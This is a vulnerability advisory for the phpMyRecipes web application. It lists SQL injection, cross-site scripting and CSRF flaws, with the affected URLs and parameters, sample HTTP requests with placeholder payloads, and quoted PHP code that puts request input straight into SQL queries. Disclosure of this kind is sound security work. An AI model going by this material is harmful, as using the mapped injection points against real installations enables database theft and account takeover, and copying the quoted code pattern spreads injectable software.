*#Product: phpMyRecipes version 1.x.x
*#Vulnerability: Multiple SQL Injection, XSS and CSRF Vulnerabilities*
*#Impact: High*
*#Authors: Rafay Baloch And Sikandar Ali*
*#Company: RHAinfoSEC *
*#Website: http://rhainfosec.com

Introduction
============

"PhpMyRecipes is a simple application for storing and retrieving recipes.
It uses a web-based interface, for ease of use

across any system, and a MySQL database backend for storing the recipes."

Description
===========

We performed both whitebox/Blackbox test for phpMyRecipies and managed to
find large number of high risk vulnerabilities.

The application is poorly coded from a security perspective as it doesn't
offer any kind of filtering mechanism for

separating normal input with malicious input.

Vulnerabilities
===============

Several High risk vulnerabilities such as SQL Injection, XSS etc were
discovered. We have provided the vulnerable code for

some of the vulnerabilities. Full details have been sent to the Vendor, so
that they may apply patches accordingly.


Multiple Cross Site Scripting Vulnerabilities
=============================================

Multiple XSS vulnerabilities were found, the user input was not sanitised
before it was returned to the user. It is

advised to filter all the special characters before displaying back the
input to the user.

Details And POC's
=================

1) http://target.com?r_id=[XSS]

2) http://target.com/ingredients/ingredients.php?from=[XSS]

3) http://target.com/login.php

REQUEST
=======

POST /login.php HTTP/1.1
Content-Length: 89
Content-Type: application/x-www-form-urlencoded
Referer: http://target.com
Host: target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

password=Uname&username=[XSS]


4) http://recipes.delattre.ca/domenusearch.php

REQUEST
=======

POST /domenusearch.php HTTP/1.1
Content-Length: 194
Content-Type: application/x-www-form-urlencoded
Referer: http://target.com
Host: Target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

r_acategory[]=5[XSS]&r_arecipes[]=0&r_days=17&r_dcategory[]=5&r_drecipes[]=0&r_mcategory[]=5&r_mrecipes[]

=0&r_servings=1&r_step=2

All Post Parameters were found vulnerable to XSS.

5)http://target.com/register.php


REQUEST
=======

POST /register.php HTTP/1.1
Content-Length: 158
Content-Type: application/x-www-form-urlencoded
Referer: http://target.com
Host: target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

email=aa@gmail.com[XSS]&name=XSS&password1=XSS&password2=XSS&username=XSS


#Note: All parameters were found vulnerable to Cross Site Scripting.



Multiple SQL Injection Vulnerabilities
======================================

Multiple SQL Injection Vulnerabilities were addressed, The user input is
directly being inserted into the SQL queries

without any proper santisation or filtering.


1) http://target.com/dosearch.php

POST DATA
categories[]=1[Inject_HERE]&ingids[]

=20&ing_modifier=2&name_exact=riuciyda&words_all=1&words_any=1&words_exact=1&words_without=1
=================================================


2) http://target.com/ingredients/ingredients.php?from=[INJECT_HERE]


Vulnerable Code
===============

  if (! empty($_POST['from'])) {
    $db_start = $_POST['from'];
  } elseif (! empty($_GET['from'])) {
    $db_start = $_GET['from'];
  } else {
    $db_start = 0;
  }


<TABLE BORDER=3 WIDTH=100%>
  <TR>
    <TH WIDTH=85%>Ingredient</TH>
    <TH COLSPAN=2>Actions</TH>
  </TR>
<?php

    if ($result = mysql_query("SELECT id,name from ingredients ORDER BY
name LIMIT $db_start, " . INGREDIENTS_PER_PAGE)) {
      while ($row = mysql_fetch_array($result)) {
?>


2) http://target.com/recipes/textrecipe.php?r_id=[INJECT_HERE]

Vulnerable Code
===============

Line 37 - 42


# Get the recipe ID to view
  $r_id = $_GET['r_id'];

  if (! ($result = mysql_query("SELECT name FROM recipes WHERE id=

$r_id"))) {
    dberror("textrecipe.php", "Cannot select recipe");
  }


3) http://target.com/

REQUEST
=======

POST /domenutext.php HTTP/1.1
Content-Length: 221
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://target.com
Host: target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

0=1&1=1&2=1&3=1&4=1&5=1&6=1&7=1&8=1&r_acategory[]=17&r_arecipes[]=[INJECT_HERE]&r_days=17&r_dcategory[]=5&r_drecipes[]

=0&r_mcategory[]=5&r_mrecipes[]=0&r_servings=1&r_step=3


4) http://target.com/dosearch.php

REQUEST
=======

POST /dosearch.php HTTP/1.1
Content-Length: 127
Content-Type: application/x-www-form-urlencoded
Referer: http://target.com
Host: target.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

categories[]=[INJECT_HERE]&ingids[]

=20&ing_modifier=2&name_exact=aaaaaaa&words_all=1&words_any=1&words_exact=1&words_without=1


Multiple CSRF Vulnerabilities
=============================

All forms were missing CSRF tokens, including some of the important ones
which would had allowed an attacker to force the

victim's browser into submitting a request which in return would had been
used to manipulate important details such as

changing email address, username etc. In our analysis, we found no CSRF
tokens to identify a legitimate request sent by

the user VS an attacker who forced victim's browser to send requests.